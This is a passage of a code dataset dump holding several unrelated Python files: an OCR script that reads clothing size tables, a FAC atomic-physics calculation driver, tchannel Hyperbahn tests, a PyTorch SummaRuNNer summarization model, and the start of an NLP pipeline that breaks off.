Skipping upload...')\n return True\n\n return False\n","sub_path":"src/nodes/data_storage.py","file_name":"data_storage.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"134874185","text":"import cv2\nimport numpy as np\nfrom PIL import Image\nfrom pytesseract import *\nimport re\nimport pandas as pd\n\nimg = Image.open(r'C:\\Users\\82107\\Desktop\\ocr_test\\ocr테스트이미지.jpg')\ntext = pytesseract.image_to_string(img,lang='kor')\nsize_table = re.split('\\n',text)\nmatchers = ['사이즈(','어깨너비','가슴둘레','소매길이','총장']\nsize = [s for s in size_table if any(xs in s for xs in matchers)]\n\nsize2 = []\nfor i in range(len(size)):\n size2.append(size[i].split())\n \nif '총장' and '소매길이' and '어깨너비' and '가슴둘레' not in size2[1][0] + size2[2][0]+size2[3][0]+size2[4][0]:\n pass\nelse:\n match = re.match(r\"([가-힣]+)([(0-9].+)\", size2[0][0], re.I)\n if match:\n items = match.groups()\n size2[0][0] = items[0]\n\n size3 = list(map(list, zip(*size2))) #리스트를 transpose하는 법\n #import numpy as np\n #np.array(a).T.tolist() - 똑같은 방법 -> array 변환 -> 전치 -> tolist\n df_size = pd.DataFrame(size3[1:], columns = size3[0])\n\nsize3=[]\nfor i in range(len(size2)):\n if len(size2[i]) == len(size2[0]):\n size3.append(size2[i])\n else:\n diff = len(size2[i]) - len(size2[0])\n size3.append(size2[i][diff:])\n\nsize4 = list(map(list, zip(*size3))) #리스트를 transpose하는 법\n\ndf_size = pd.DataFrame(size4[1:], columns = size4[0])\n\nprint(df_size)\n\nwith open(r'C:\\Users\\82107\\Desktop\\file\\testtest', 'w') as file:\n print(df_size, file=file) #size 추출\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"code/jonggeun.py","file_name":"jonggeun.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"479972825","text":"from optparse import OptionParser\nfrom pfac.fac import *\nfrom time import time\nimport math\nimport os\n\nt0 = time()\n\n#parse cmdline args\np = OptionParser()\np.add_option('-z', '--z', dest='z', type='int',\n default=26, help='atomic number')\np.add_option('-n', '--n', dest='n', type='int',\n default=1, help='number of M-shell electrons')\np.add_option('-p', '--np', dest='np', type='int',\n default=1, help='number of processors')\np.add_option('-m', '--nmax', dest='nmax', type='int',\n default=5, help='max principle quantum number')\np.add_option('-i', '--imax', dest='imax', type='int',\n default=0, help='inner shell excitation')\np.add_option('-v', '--vmax', dest='vmax', type='int',\n default=-8, help='virtual orbital n max')\np.add_option('--n2max', dest='n2max', type='int',\n default=0, help='max n of the 2nd virtual orbital')\np.add_option('-r', '--nr', dest='nr', type='int',\n default=0, help='job id for the n1 split run')\np.add_option('-s', '--nsp', dest='nsp', type='int',\n default=16, help='number of n1s in split jobs')\np.add_option('-t', '--ntr', dest='ntr', type='int',\n default=0, help='mbpt transition rate option')\np.add_option('-k', '--nk', dest='nk', type='int',\n default=-1, help='k shell max excitation')\np.add_option('-c', '--csf', dest='csf', type='int',\n default=0, help='convert to sfac input file')\np.add_option('-a', '--mmax', dest='mm', type='float',\n default=0, help='maximum memory usage for radial integra caching')\np.add_option('-d', '--dry', dest='dry', type='int',\n default=0, help='dry run, stop after configuration setup')\np.add_option('--m3d', dest='m3d', type='int',\n default=0, help='max n of 
double excitation of M-shell')\np.add_option('--m3i', dest='m3i', type='int',\n default=0, help='max n of double excitation of L-shell')\np.add_option('--oc', dest='oc', type='string',\n default='ic', help='configuration for potential optimization')\np.add_option('--om', dest='om', type='int',\n default=20, help='optimizaiton mode')\np.add_option('--od', dest='od', type='string',\n default='', help='output directory')\np.add_option('--mcc', dest='mcc', type='int',\n default=9, help='maximum n of correlation config')\np.add_option('--mcc2', dest='mcc2', type='int',\n default=9, help='maximum n of correlation config')\np.add_option('--kmax', dest='kmax', type='int',\n default=8, help='max orbital partial wave')\np.add_option('--kcc', dest='kcc', type='int',\n default=8, help='maximum l of correlation config')\np.add_option('--acc', dest='acc', type='float',\n default=0.05, help='correlation mixing threshold')\np.add_option('--acc2', dest='acc2', type='float',\n default=0.05, help='correlation mixing threshold')\np.add_option('--hiter', dest='hiter', type='int',\n default=0, help='hamilton iteration for perturbing configs')\np.add_option('--piter', dest='piter', type='int',\n default=50, help='perturb config iteration to enlarging ci space')\np.add_option('--ptol', dest='ptol', type='float',\n default=0.01, help='perturb config cutoff tolerance')\np.add_option('--expdim', dest='expdim', type='float',\n default=0.05, help='perturb config cutoff tolerance')\np.add_option('--expdimz', dest='expdimz', type='float',\n default=1e-4, help='perturb config cutoff tolerance')\np.add_option('--mcut0', dest='mcut0', type='float',\n default=1e-3, help='correlation mixing threshold')\np.add_option('--mcut1', dest='mcut1', type='float',\n default=1e-1, help='correlation mixing threshold')\np.add_option('--mcut2', dest='mcut2', type='float',\n default=1e-1, help='correlation mixing threshold')\np.add_option('--mcut3', dest='mcut3', type='float',\n default=1.0, help='correlation mixing threshold')\np.add_option('--nrg', dest='nrg', type='int',\n default='1500', help='radial grid points')\np.add_option('--nbr', dest='nbr', type='int',\n default=-3, help='breit max n')\np.add_option('--mbr', dest='mbr', type='int',\n default=0, help='breit mode')\np.add_option('--kbr', dest='kbr', type='int',\n default=0, help='breit min n')\np.add_option('--nse', dest='nse', type='int',\n default=-2, help='self energy maxn')\np.add_option('--mse', dest='mse', type='int',\n default=41, help='self energy mode')\np.add_option('--ci', dest='ci', type='int',\n default=0, help='do ci calculation only')\np.add_option('--bas', dest='bas', type='int',\n default=1, help='print out basis and mixing coeff')\np.add_option('--pj', dest='pj', type='int',\n default=-1, help='symmetry to include')\np.add_option('--pp', dest='pp', type='int',\n default=-1, help='parity to include')\np.add_option('--jmin', dest='jmin', type='int',\n default=-1, help='min 2J to include')\np.add_option('--nj', dest='nj', type='int',\n default=1, help='number of Js to include')\np.add_option('--dnm', dest='dnm', type='int',\n default=0, help='extra delta n for config in ci')\np.add_option('--odn', dest='odn', type='int',\n default=0, help='potential boundary n')\np.add_option('--mcut', dest='mcut', type='float',\n default=0.65, help='mixing coeff cutoff for id levels')\np.add_option('--pm', dest='pm', type='int',\n default=2, help='parallel mode')\np.add_option('--pseudo', dest='pseudo', type='int',\n default=-100, help='use pseudo orbital for 
virtual')\np.add_option('--xdf', dest='xdf', type='float',\n default=-1, help='xdf param for pseudo orb')\np.add_option('--rand', dest='rand', type='int',\n default=11, help='randomize config list')\np.add_option('--warn', dest='warn', type='float',\n default=0.5, help='warn large mbpt terms')\np.add_option('--ignore', dest='ignore', type='float',\n default=50.0, help='ignore large mbpt terms')\np.add_option('--rc', dest='rc', type='string',\n default='', help='read config list')\np.add_option('--rh', dest='rh', type='string',\n default='', help='read hamilton')\np.add_option('--ic', dest='ic', type='string',\n default='', help='individual config')\np.add_option('--itr', dest='itr', type='int',\n default=0, help='compute CI transition rates')\np.add_option('--ice', dest='ice', type='int',\n default=0, help='compute CI excitation')\n\n(opts, args) = p.parse_args()\n\nprint(opts)\n\nif opts.od != '':\n x = os.system('mkdir %s'%opts.od)\nodir = opts.od\nif opts.ic != '':\n if odir == '':\n odir='.'\n odir = '%s/%s'%(odir,opts.ic)\n x = os.system('mkdir %s'%odir)\n \nir = opts.nr\nasym = ATOMICSYMBOL[opts.z]\n\nif opts.csf > 0:\n if ir >= 0:\n ConvertToSFAC('dl%d.sf'%ir)\n else:\n ConvertToSFAC('dl.sf')\n\nif opts.np > 1:\n InitializeMPI(opts.np)\nSetAtom(asym)\n\nn = opts.n \nnmax = opts.nmax\npref='%s%02d'%(asym, n)\nif odir != '':\n pref='%s/%s'%(odir,pref)\n \nif ir >= 0 and opts.ci == 0:\n p0 = '%si%02d'%(pref,ir)\nelif opts.ci > 0:\n p0 = '%sc'%pref\nelse:\n p0 = pref\n\nopts.m3d = min(opts.m3d, opts.nmax)\nopts.m3i = min(opts.m3i, opts.imax)\n\nm3d=opts.m3d\nif opts.rc != '':\n ReadConfig(opts.rc)\n\nn = n-2\ngc=[]\ngc.append('g')\nif opts.rc == '' :\n if n < 3:\n Config('g', '1s2 2s%d'%n)\n else:\n Config('g', '1s2 2s2 2p%d'%(n-2))\n \ngv=['g']\nv3 = []\nv4 = []\nfor m in range(2, nmax+1):\n bc = ['2s', '2p']\n for k0 in range(2):\n for k1 in range(m):\n if m == 2 and k1 <= k0:\n continue\n gn = 'g_n2k%d_n%dk%d'%(k0,m,k1)\n gc.append(gn)\n if m == 2:\n gv.append(gn)\n elif m == 3:\n v3.append(gn)\n elif m == 4:\n v4.append(gn)\n if opts.rc == '':\n Config(1, gn, ['g'], bc[k0], m, m, k1, k1)\ni=1\nfor m in range(2, nmax+1):\n for k0 in range(2):\n for k1 in range(m):\n if m == 2 and k1 <= k0:\n continue\n gn = 'd_n2k%d_n%dk%d'%(k0,m,k1)\n if m <= opts.m3d:\n gc.append(gn)\n #gv.append(gn)\n if opts.rc == '':\n Config(1, gn, [gc[i]], '2*1', 2, 2)\n i = i + 1\ngi=[]\ni0 = len(gc)\nif (opts.imax > 1):\n for m in range(2, opts.imax+1):\n bc = ['1s']\n for k0 in range(1):\n for k1 in range(m):\n gn = 'g_n1k%d_n%dk%d'%(k0, m, k1)\n gc.append(gn)\n if m == 2:\n gi.append(gn)\n if opts.rc == '':\n Config(1, gn, ['g'], bc[k0], m, m, k1, k1)\n i = i0\n for m in range(2, opts.imax+1): \n for k0 in range(1):\n for k1 in range(m):\n gn = 'd_n2k%d_n%dk%d'%(k0,m,k1)\n if m <= opts.m3i:\n gc.append(gn)\n #gi.append(gn)\n if opts.rc == '':\n Config(1, gn, [gc[i]], '2*1', 2, 2)\n i = i + 1\n \nif opts.vmax <= 0:\n n1 = [2, 3, 4, 5, 6, 7, 8, 9, 10, 12, 16, 24, 36, 54, 90]\nelse:\n n1 = list(range(2, opts.vmax+1))\nif opts.n2max <= 0:\n n2 = list(range(9))+[9, 11, 15, 23, 40]\n nn2 = len(n2)\nelse:\n n2 = opts.n2max\n nn2 = n2\n\nif opts.vmax <= 0 and opts.n2max <= 0:\n nvm = n1[-1]+n2[-1]\nelif opts.vmax <= 0:\n if opts.n2max < 1000:\n nvm = n1[-1]+opts.n2max\n else:\n nvm = max(n1[-1], opts.n2max/1000)\nelse:\n if opts.n2max < 1000:\n nvm = opts.vmax+opts.n2max\n else:\n nvm = max(opts.vmax, opts.n2max/1000)\n\nnn = len(n1)\nif opts.pm == 0:\n ncp = 0\n if (opts.nsp <= 0):\n nsp = nn\n ns = [0, nn]\n 
elif opts.nsp >= nn-1:\n nsp = nn-1\n ns = [0]+list(range(2,len(n1)+1))\n else:\n nsp = opts.nsp\n ns = list(range(0,nn+1,nn/nsp))\n if ns[-1] < nn:\n ns[-1] = nn\n ni = n1[ns[i]:ns[i+1]]\nelse:\n ncp = opts.nsp\n nsp = nn\n ns = [0, nn]\n ni = n1\n \nPrint('n1:', n1)\nPrint('nn1=%d, nn2=%d nsp=%d'%(nn, nn2, nsp))\n\neps = 1e-4\nif (opts.nbr < -1):\n opts.nbr = max(opts.nmax, opts.imax)+abs(opts.nbr)-1\nif (opts.nse < -1):\n opts.nse = max(opts.nmax, opts.imax)+abs(opts.nse)-1\n#QED correction options\nSetVP(103)\nSetMS(3, 3)\nSetSE(opts.nse, opts.mse)\nSetBreit(opts.nbr, opts.mbr, -1, -1, opts.kbr)\n\nPrintNucleus()\nPrintNucleus(1, p0+'a.iso')\nPrintQED()\nPrint('kmax=%d'%opts.kmax)\nPrint('ns=%d'%(len(ns)-1))\nPrint(ns)\nif ir >= 0:\n Print(ni)\n Print(n2)\n \nif opts.dry > 0:\n if ir >= 0 and opts.np > 1:\n FinalizeMPI()\n exit(0)\n \nif (opts.mm > 0):\n LimitArray(-1, opts.mm)\ntry: \n OptimizeRadial('g')\nexcept:\n exit(0)\nif ir >= 0 or opts.rc == '' or opts.ntr > 0:\n SetBoundary(max(nmax,opts.imax)+opts.odn, eps, 1e30)\n\n ReinitRadial(0)\n SetRadialGrid(opts.nrg, 1.1, -1e30, 0.0, 1.0)\n\n Print('opt config: %s %d'%(opts.oc, opts.om))\n SetPotentialMode(opts.om, 1e30, 0)\n try:\n if opts.oc == 'g':\n OptimizeRadial('g')\n elif opts.oc == 'gv':\n OptimizeRadial(gv)\n elif opts.oc == 'v3':\n OptimizeRadial(v3)\n elif opts.oc == 'v4':\n OptimizeRadial(v4)\n elif opts.oc == 'gv3':\n OptimizeRadial(gv+v3)\n elif opts.oc == 'gi':\n OptimizeRadial(gi)\n elif opts.oc == 'gvi':\n OptimizeRadial(gv+gi)\n elif opts.oc == 'ic' and opts.ic != '':\n OptimizeRadial(opts.ic)\n except:\n exit(0)\n \n SetBoundary(max(nmax,opts.imax)+opts.odn, eps, 1e30)\nGetPotential(p0+'a.pot')\n\nif opts.pseudo >= -2:\n Print('solve pseudo orbs')\n SolvePseudo(opts.kmax, nvm, 0, 0, opts.pseudo, opts.xdf)\n \nif opts.mcut > 0:\n SetMixCut(-1, opts.mcut)\n\nif opts.pj >= 0:\n Structure(opts.pj%2, opts.pj/2) \nelif opts.jmin >= 0 and opts.nj > 0:\n j0 = opts.jmin\n if opts.n%2 != j0%2:\n j0 += 1\n Structure(opts.pp, list(range(j0, j0+opts.nj*2, 2)))\n \nStructure(opts.hiter)\nStructure(-opts.piter-1, opts.ptol, opts.expdim, opts.expdimz)\n\nga = gc\nif opts.ic != '':\n ga0 = [opts.ic]\n gc = [opts.ic]\n for c in ga:\n if c != opts.ic:\n ga0.append(c)\n ga=ga0\n\nif opts.mcc > 1:\n ga = ga + ['cc1', 'cc2']\n if opts.rc == '':\n Config(3, 'cc1', gc, '2*1 3*1 4*1 5*1', 2, opts.mcc, 0, opts.kcc, 0, 0, opts.acc, 1)\n if opts.mcc2 > 1:\n Config(3, 'cc2', ga[len(gc):-1], '2*1 3*1 4*1 5*1', 2, opts.mcc2, 0, opts.kcc, 0, 0, -opts.acc2, gc)\n \nListConfig(p0+'a.cfg')\n\nif opts.ci > 0: \n Structure(p0+'b.en', p0+'b.ham', gc, ga[len(gc):], 1)\n BasisTable(p0+'a.bs')\n BasisTable(p0+'a', 10)\n MemENTable(p0+'b.en')\n PrintTable(p0+'b.en', p0+'a.en')\n TRTable(p0+'b.tr', gc[0:1], gc)\n PrintTable(p0+'b.tr', p0+'a.tr')\n exit(0)\n\nTransitionMBPT(opts.ntr, opts.ntr)\nif ir >= 0:\n StructureMBPT(opts.warn, opts.ignore)\n StructureMBPT(opts.rand, 0, opts.mcut0, opts.mcut1, opts.mcut2, opts.mcut3)\n mex = 0\n if (opts.pm == 2):\n mex = 6\n elif opts.nsp >= nn:\n mex = 1\n if opts.vmax != 0:\n StructureMBPT(abs(opts.vmax)*10+mex)\n else:\n StructureMBPT(mex)\n if opts.nk >= 0:\n StructureMBPT('1s', opts.nk)\n if opts.rh == '':\n StructureMBPT(p0+'b.en', [p0+'b.ham', p0+'b.ham0'],\n ga, opts.kmax, ni, n2, len(gc), ncp, ir)\n else:\n StructureMBPT(p0+'b.en', [p0+'b.ham', opts.rh],\n '', opts.kmax, ni, n2, len(gc), ncp, ir)\n if opts.bas:\n BasisTable(p0+'a.bs')\n BasisTable(p0+'a', 10)\n MemENTable(p0+'b.en')\n PrintTable(p0+'b.en', 
p0+'a.en')\nelse:\n if opts.pm == 0:\n nns = len(ns)-1\n else:\n nns = ncp\n h = [pref+'i%02db.ham'%x for x in range(nns)]\n mex = 1\n if (opts.pm == 2):\n mex += 5\n if opts.vmax != 0:\n StructureMBPT(abs(opts.vmax)*10+mex)\n else:\n StructureMBPT(mex)\n if (opts.ntr > 0):\n TransitionMBPT(p0+'b.tr', gc[0:1], gc)\n StructureMBPT(p0+'b.en', pref+'i00b.ham0', h, ga, len(gc))\n if opts.bas:\n BasisTable(p0+'a.bs')\n BasisTable(p0+'a', 10)\n MemENTable(p0+'b.en')\n PrintTable(p0+'b.en', p0+'a.en')\n if (opts.ntr > 0):\n PrintTable(p0+'b.tr', p0+'a.tr')\n if opts.itr > 0:\n TRTable(p0+'b.tr', gc, gc)\n PrintTable(p0+'b.tr', p0+'a.tr')\n if opts.ice > 0:\n CETable(p0+'b.ce', gv, gc)\n PrintTable(p0+'b.ce', p0+'a.ce')\n\nt1 = time()\nPrint('all done %d %10.3E'%(opts.nr,t1-t0))\nif opts.np > 1:\n FinalizeMPI()\nif opts.csf > 0:\n CloseSFAC()\n","sub_path":"dl.py","file_name":"dl.py","file_ext":"py","file_size_in_byte":14871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"477017979","text":"# Copyright (c) 2016 Uber Technologies, Inc.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nfrom __future__ import absolute_import\n\nimport os\nimport json\nimport pytest\nimport tornado\n\nfrom tchannel.errors import NoAvailablePeerError\nfrom tchannel.tornado import TChannel\nfrom tchannel.tornado import hyperbahn\n\n\ndef test_new_client_establishes_peers():\n routers = ['127.0.0.1:2300' + str(i) for i in xrange(5)]\n\n # TChannel knows about one of the peers already.\n channel = TChannel('test', known_peers=['127.0.0.1:23002'])\n\n hyperbahn.advertise(\n channel,\n 'baz',\n routers,\n )\n\n for router in routers:\n assert channel.peers.lookup(router)\n\n\ndef test_new_client_establishes_peers_from_file():\n\n host_path = os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n '../data/hosts.json',\n )\n\n # TChannel knows about one of the peers already.\n channel = TChannel('test', known_peers=['127.0.0.1:23002'])\n\n hyperbahn.advertise(\n channel,\n 'baz',\n None,\n None,\n host_path\n )\n\n with open(host_path, 'r') as json_data:\n routers = json.load(json_data)\n for router in routers:\n assert channel.peers.lookup(router)\n\n\n@pytest.mark.gen_test\ndef test_advertise_should_raise_on_invalid_router_file():\n\n channel = TChannel(name='client')\n with pytest.raises(IOError):\n yield hyperbahn.advertise(\n channel,\n 'baz',\n None,\n None,\n '?~~lala')\n\n with pytest.raises(ValueError):\n yield hyperbahn.advertise(\n channel,\n 'baz',\n '?~~lala',\n None,\n '?~~lala')\n\n\n@pytest.mark.gen_test\ndef test_request():\n channel = TChannel(name='test')\n hyperbahn.advertise(channel, 'foo', ['127.0.0.1:23000'])\n\n # Just want to make sure all the plumbing fits together.\n\n with pytest.raises(NoAvailablePeerError):\n yield channel.request(service='bar').send(\n arg1='baz',\n arg2='bam',\n arg3='boo',\n headers={'as': 'qux'},\n )\n\n\n@pytest.mark.gen_test\ndef test_advertise():\n server = TChannel(name=\"test_server\")\n\n @server.register('ad', 'json')\n @tornado.gen.coroutine\n def ad(request, response):\n body = yield request.get_body()\n response.write_body(body)\n\n server.listen()\n channel = TChannel(name='test')\n\n response = yield hyperbahn.advertise(\n channel,\n 'test', [server.hostport]\n )\n result = yield response.get_body()\n assert (\n result == '{\"services\": [{\"serviceName\": \"test\", \"cost\": 0}]}' or\n result == '{\"services\": [{\"cost\": 0, \"serviceName\": \"test\"}]}'\n )\n","sub_path":"tests/tornado/test_hyperbahn.py","file_name":"test_hyperbahn.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"478429159","text":"\nfrom allennlp.nn.util import sort_batch_by_length\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\"\"\"\nTODO:\n - Batching (30 sentences?)\n - New affines + character-level RNN to encode words.\n\n\"\"\"\n\n\nclass SummaRuNNer(nn.Module):\n\n def __init__(self, vocab_size, embedding_size, hidden_size, batch_size,\n position_size=1000, position_embedding_size=100,\n layers=1, dropout=0.5):\n\n \"\"\"\n SummaRuNNer: A neural-based sentence classifier for Extractive Summarization.\n\n Parameters:\n -----------\n :param vocab_size: int\n The embedding size for embedding input words (space in which\n 
words are projected).\n\n :param embedding_size: int\n The embedding size for embedding input words (space in which\n words are projected).\n\n :param hidden_size: int\n The hidden size of the bi-directional GRU.\n\n :param position_size: int\n The length of the longest document in sentences.\n\n :param position_embedding_size: int\n The embedding size for absolute and relative position embeddings.\n \"\"\"\n # Save the construction arguments, useful for serialization\n self.init_arguments = locals()\n self.init_arguments.pop(\"self\")\n self.init_arguments.pop(\"__class__\")\n super(SummaRuNNer, self).__init__()\n\n self.vocab_size = vocab_size\n self.hidden_size = hidden_size\n self.embedding_size = embedding_size\n self.batch_size = batch_size\n self.layers = layers\n self.position_embedding_size = position_embedding_size\n self.position_size = position_size\n\n # Activations\n self.tanh = nn.Tanh()\n\n # Learned word embeddings (vocab_size x embedding_size)\n self.embedding = nn.Embedding(vocab_size, embedding_size)\n\n # Positional embeddings\n self.abs_pos_embedding = nn.Embedding(position_size,\n position_embedding_size)\n self.rel_pos_embedding = nn.Embedding(position_size,\n position_embedding_size)\n\n # SummaRuNNer coherence affine transformations.\n self.content = nn.Linear(hidden_size * 2, 1, bias=False)\n self.salience = nn.Bilinear(hidden_size * 2, hidden_size * 2, 1,\n bias=False)\n self.novelty = nn.Bilinear(hidden_size * 2, hidden_size * 2, 1,\n bias=False)\n self.abs_pos = nn.Linear(position_embedding_size, 1, bias=False)\n self.rel_pos = nn.Linear(position_embedding_size, 1, bias=False)\n\n self.word_rnn = nn.GRU(\n input_size=embedding_size,\n hidden_size=hidden_size,\n num_layers=layers,\n dropout=dropout,\n batch_first=True,\n bidirectional=True\n )\n\n self.sentence_rnn = nn.GRU(\n input_size=hidden_size * 2,\n hidden_size=hidden_size,\n num_layers=layers,\n dropout=dropout,\n batch_first=True, bidirectional=True\n )\n\n # Encoders and Decoders\n self.decoder = nn.Linear(hidden_size, vocab_size)\n self.encode_document = nn.Linear(hidden_size * 2, hidden_size * 2)\n\n def init_hidden(self):\n \"\"\"\n Produce a new, initialized hidden state variable where all values\n are zero.\n :return: A torch Tensor.\n \"\"\"\n\n weight = next(self.parameters()).data\n return Variable(weight.new(self.layers, self.batch_size,\n self.hidden_size).zero_())\n\n def document_representation(self, document_tensor):\n \"\"\"\n Compute the sentence representation, D.\n :param document_tensor:\n Stacked tensors of the sentences given throughout the document.\n Assumes document_tensor is wrapped with Variable.\n :return: D: The average pooled representation of the document.\n \"\"\"\n\n # 1. Pad variable lengths sentences to prevent the model from learning\n # from the padding.\n\n # Collect lengths for sorting and padding.\n # Shape: (batch_size,)\n document_mask = (document_tensor != 0)\n sentence_lengths = Variable(document_mask.sum(dim=1))\n\n # Shape: (batch_size x max sentence length x embedding size)\n embedded_sentences = self.embedding(Variable(document_tensor))\n sorted_embeddings, sorted_lengths, restore_index, permute_index \\\n = sort_batch_by_length(embedded_sentences, sentence_lengths)\n\n sorted_lengths = list(sorted_lengths.data.long())\n\n packed_sentences = nn.utils.rnn.pack_padded_sequence(sorted_embeddings,\n sorted_lengths,\n batch_first=True)\n\n # 2. 
Encode the sentences at the word level.\n # Shape: (batch_size x max sentence length x bidirectional hidden)\n # (batch_size x bidirectional hidden)\n sentences_out, sentences_hidden = self.word_rnn(packed_sentences)\n\n padded_sentences, padded_sentences_lengths = \\\n nn.utils.rnn.pad_packed_sequence(sentences_out, batch_first=True)\n\n # Restore order for predictions.\n encoded_sentences_restored = padded_sentences[restore_index]\n\n # 3. Pool along the length dimension.\n sentence_representations = torch.mean(encoded_sentences_restored, 1)\n\n # 4. Encode the document at the sentence level.\n doc_out, doc_hiddens = self.sentence_rnn(sentence_representations.unsqueeze(0))\n\n # 4. Average the sentence representations and push through affine.\n pooled_doc_out = torch.mean(doc_out.squeeze(), 0)\n doc_rep = self.encode_document(pooled_doc_out)\n\n return sentence_representations, doc_rep\n\n def forward(self, sentence_hidden_states, index, running_summary,\n document_lengths, document_representations):\n \"\"\"\n Given a sentence at index 'index' for a given document,\n predicts whether the sentence should be included in the\n current running summary.\n :param sentence_hidden_states: torch.FloatTensor\n An encoded sentence to classify.\n :param index: int\n The place in which it occurs in the document.\n :param running_summary: torch.FloatTensor\n The current running summary representation.\n :param doc_len: int\n The length of the document in sentences.\n :param document_representations: torch.FloatTensor\n The average pooling of all sentences in the document.\n :return: The probability of this sentence being included in a summary.\n \"\"\"\n # Forward pass through the bidirectional GRU.\n # Pass through Bidirectional word-level RNN with batch size 1.\n # By taking the number of sentences rather than the batch size, allows\n # remainders to be included in the calculation.\n abs_index = torch.LongTensor([index] * sentence_hidden_states.size(0))\n\n # Quantize each document into 10 segments.\n rel_index = ((abs_index.float() / document_lengths.float()) * 10).long()\n\n # Embed the positions.\n absolute_pos_embedding = self.abs_pos_embedding(Variable(abs_index))\n relative_pos_embedding = self.rel_pos_embedding(Variable(rel_index))\n\n # Classify the sentence.\n content = self.content(sentence_hidden_states)\n\n # Salience = h_t^T x W_salience x D\n salience = self.salience(sentence_hidden_states, document_representations)\n\n # Novelty = h_j^T x W_novelty * Tanh(s_j)\n novelty = self.novelty(sentence_hidden_states, self.tanh(running_summary))\n\n absolute_position_importance = self.abs_pos(absolute_pos_embedding)\n relative_position_importance = self.rel_pos(relative_pos_embedding)\n\n probabilities = F.sigmoid(content\n + salience\n - novelty # Punish for repeating words.\n + absolute_position_importance\n + relative_position_importance)\n\n return probabilities\n","sub_path":"machine_dictionary_rc/models/SummaRuNNer.py","file_name":"SummaRuNNer.py","file_ext":"py","file_size_in_byte":8601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"588040295","text":"import sys\nimport os\n# import libraries\nimport re\nimport numpy as np\nimport pandas as pd\nfrom sqlalchemy import create_engine\nfrom scipy.stats.mstats import gmean\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\n#from nltk.corpus import stopwords\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.model_selection import 
train_test_split\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier, AdaBoostClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression, SGDClassifier\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import make_scorer\nfrom sklearn.multioutput import MultiOutputClassifier\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.metrics import confusion_matrix, accuracy_score, f1_score, precision_score, recall_score, fbeta_score\nfrom sklearn.metrics import classification_report\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.externals import joblib\nimport nltk\nnltk.download(['punkt', 'wordnet','stopwords'])\n## define some custom stopwords\n#full stopwords from nltk\nstopwords_a= ['i', 'me', 'my', 'myself', 'we', 'our', 'ours', 'ourselves', 'you',\n \"you're\", \"you've\", \"you'll\", \"you'd\", 'your', 'yours', 'yourself',\n 'yourselves', 'he', 'him', 'his', 'himself', 'she', \"she's\", 'her',\n 'hers', 'herself', 'it', \"it's\", 'its', 'itself', 'they', 'them',\n 'their', 'theirs', 'themselves', 'what', 'which', 'who', 'whom', 'this',\n 'that', \"that'll\", 'these', 'those', 'am', 'is', 'are', 'was', 'were',\n 'be', 'been', 'being', 'have', 'has', 'had', 'having', 'do', 'does',\n 'did', 'doing', 'a', 'an', 'the', 'and', 'but', 'if', 'or', 'because',\n 'as', 'until', 'while', 'of', 'at', 'by', 'for', 'with', 'about',\n 'against', 'between', 'into', 'through', 'during', 'before', 'after',\n 'above', 'below', 'to', 'from', 'up', 'down', 'in', 'out', 'on', 'off',\n 'over', 'under', 'again', 'further', 'then', 'once', 'here', 'there',\n 'when', 'where', 'why', 'how', 'all', 'any', 'both', 'each', 'few',\n 'more', 'most', 'other', 'some', 'such', 'no', 'nor', 'not', 'only',\n 'own', 'same', 'so', 'than', 'too', 'very', 's', 't', 'can', 'will',\n 'just', 'don', \"don't\", 'should', \"should've\", 'now', 'd', 'll', 'm',\n 'o', 're', 've', 'y', 'ain', 'aren', \"aren't\", 'couldn', \"couldn't\",\n 'didn', \"didn't\", 'doesn', \"doesn't\", 'hadn', \"hadn't\", 'hasn', \"hasn't\",\n 'haven', \"haven't\", 'isn', \"isn't\", 'ma', 'mightn', \"mightn't\", 'mustn',\n \"mustn't\", 'needn', \"needn't\", 'shan', \"shan't\", 'shouldn', \"shouldn't\",\n 'wasn', \"wasn't\", 'weren', \"weren't\", 'won', \"won't\", 'wouldn', \"wouldn't\"]\n\n#customized stopwords from nltk, verbs leftout\nstopwords_b= ['i', 'me', 'my', 'myself', 'we', 'our', 'ours', 'ourselves', 'you',\n \"you're\", \"you've\", \"you'll\", \"you'd\", 'your', 'yours', 'yourself',\n 'yourselves', 'he', 'him', 'his', 'himself', 'she', \"she's\", 'her',\n 'hers', 'herself', 'it', \"it's\", 